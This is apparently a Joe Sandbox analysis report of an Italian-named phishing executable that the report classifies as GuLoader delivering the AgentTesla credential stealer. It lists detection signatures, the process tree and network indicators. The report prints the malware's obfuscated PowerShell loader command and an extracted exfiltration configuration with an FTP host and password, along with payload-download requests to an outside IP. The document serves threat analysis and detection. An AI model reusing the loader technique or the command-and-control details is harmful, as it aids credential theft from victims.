Edit tour

Windows Analysis Report
Documenti di spedizione 0009333000459595995.exe

Overview

General Information

Sample name:	Documenti di spedizione 0009333000459595995.exe
Analysis ID:	1518101
MD5:	6c446fd0a3f6d498f5cbd0725ce7f232
SHA1:	d814c5f4bc9a61690318ba2ed8ec22d55af16cce
SHA256:	8a149e1ded1cce5485b9783687dd8f94c2f3926edd17e62a682fe56cc73b1ae4
Tags:	exeSpam-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Powershell drops PE file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Documenti di spedizione 0009333000459595995.exe (PID: 6728 cmdline: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe" MD5: 6C446FD0A3F6D498F5CBD0725CE7F232)

powershell.exe (PID: 5480 cmdline: "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wabmig.exe (PID: 6824 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "ftp://ftp.concaribe.com", "Password": "net_log_releasing_connection"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.2394657139.0000000008C11000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: wabmig.exe PID: 6824	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wabmig.exe PID: 6824	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5480, TargetFilename: C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" , CommandLine: "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe", ParentImage: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe, ParentProcessId: 6728, ParentProcessName: Documenti di spedizione 0009333000459595995.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" , ProcessId: 5480, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T12:09:07.525705+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49737	185.29.11.53	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://ftp.concaribe.com

Avira URL Cloud: Label: malware

Found malware configuration

Source: powershell.exe.5480.1.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "ftp://ftp.concaribe.com", "Password": "net_log_releasing_connection"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: Documenti di spedizione 0009333000459595995.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: Documenti di spedizione 0009333000459595995.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: jqm.Core.pdb source: powershell.exe, 00000001.00000002.2389766114.00000000070C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2389766114.00000000070C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbPCp source: powershell.exe, 00000001.00000002.2393965982.00000000081B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbLC source: powershell.exe, 00000001.00000002.2393965982.00000000081B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2389766114.00000000070C4000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C63
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Code function: 0_2_004068B4 FindFirstFileW,FindClose,	0_2_004068B4

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 192.185.13.234 192.185.13.234

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 185.29.11.53:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bIGuEflfnZjESw74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.29.11.53Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.53

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bIGuEflfnZjESw74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.29.11.53Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ftp.concaribe.com

Source: wabmig.exe, 00000006.00000002.2932025679.0000000008166000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 00000006.00000002.2944817255.0000000023210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://185.29.11.53/bIGuEflfnZjESw74.bin
Source: wabmig.exe, 00000006.00000002.2932025679.0000000008166000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.29.11.53/bIGuEflfnZjESw74.binI
Source: wabmig.exe, 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://concaribe.com
Source: wabmig.exe, 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.concaribe.com
Source: Documenti di spedizione 0009333000459595995.exe, Documenti di spedizione 0009333000459595995.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2377692974.0000000004BE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2377692974.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2377692974.0000000004BE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2377692974.0000000004A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBfq
Source: wabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: wabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: wabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2377692974.0000000004BE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown

HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

Code function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040571B

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Documenti di spedizione 0009333000459595995.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403532

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File created: C:\Windows\SysWOW64\sennepssovsen			Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File created: C:\Windows\resources\0809			Jump to behavior

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Code function: 0_2_00406DC6	0_2_00406DC6
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Code function: 0_2_0040759D	0_2_0040759D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00C1EBD8	1_2_00C1EBD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00C1F4A8	1_2_00C1F4A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00C1E890	1_2_00C1E890
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_026DA228	6_2_026DA228
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_026DE360	6_2_026DE360
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_026D4A58	6_2_026D4A58
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_026DAAB0	6_2_026DAAB0
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_026D3E40	6_2_026D3E40
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_026D4188	6_2_026D4188
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_2693CE30	6_2_2693CE30
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_2693A7DC	6_2_2693A7DC
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_269392C8	6_2_269392C8
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_2693BB90	6_2_2693BB90
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_269556A0	6_2_269556A0
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_269566C0	6_2_269566C0
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_26957E40	6_2_26957E40
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_2695C240	6_2_2695C240
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_26952380	6_2_26952380
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_2695B300	6_2_2695B300
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_26957760	6_2_26957760
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_2695E468	6_2_2695E468
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_26955DC8	6_2_26955DC8
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_26950040	6_2_26950040
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_26950006	6_2_26950006

Source: Documenti di spedizione 0009333000459595995.exe

Static PE information: invalid certificate

Source: Documenti di spedizione 0009333000459595995.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/12@2/3

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

0_2_00403532

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

Code function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049C7

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

Code function: 0_2_004021AF CoCreateInstance,

0_2_004021AF

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

File created: C:\Users\user\AppData\Local\acneform

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_03

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

File created: C:\Users\user\AppData\Local\Temp\nspE80D.tmp

Jump to behavior

Source: Documenti di spedizione 0009333000459595995.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

File read: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: riched20.dll	Jump to behavior
